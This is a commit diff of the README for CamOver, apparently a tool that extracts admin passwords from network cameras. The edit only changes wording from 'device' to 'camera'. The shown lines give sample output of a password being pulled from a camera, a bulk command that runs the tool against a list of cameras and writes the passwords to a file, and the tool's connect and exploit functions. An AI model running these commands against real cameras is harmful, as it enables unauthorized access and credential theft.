Projects STRLCPY CamOver Commits 18368b47
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 46 lines
    47 47  **output:**
    48 48   
    49 49  ```shell
    50  -[*] (192.168.99.100) - connecting to device...
    51  -[*] (192.168.99.100) - accessing device rom...
     50 +[*] (192.168.99.100) - connecting to camera...
     51 +[*] (192.168.99.100) - accessing camera config...
    52 52  [*] (192.168.99.100) - extracting admin password...
    53 53  [i] (192.168.99.100) - password: mamahacker123
    54 54  ```
    skipped 30 lines
    85 85  [i] Thread #2 completed.
    86 86  ```
    87 87   
    88  -Let's try to use opened database of hosts with `-t` for fast exploitation.
     88 +Let's try to use opened database of cameras with `-t` for fast exploitation.
    89 89   
    90 90  ```shell
    91 91  camover -t -i cameras.txt -o passwords.txt
    skipped 33 lines
    125 125   
    126 126  ### Basic functions
    127 127   
    128  -There are all CamOver basic functions that can be used to exploit specified device.
     128 +There are all CamOver basic functions that can be used to exploit specified camera.
    129 129   
    130  -* `connect(host)` - Connect specified defice by network address.
    131  -* `exploit(device)` - Exploit connected device.
     130 +* `connect(host)` - Connect specified camera by network address.
     131 +* `exploit(camera)` - Exploit connected camera.
    132 132   
    133 133  ### Examples
    134 134   
    skipped 44 lines
Please wait...
Page is in error, reload to recover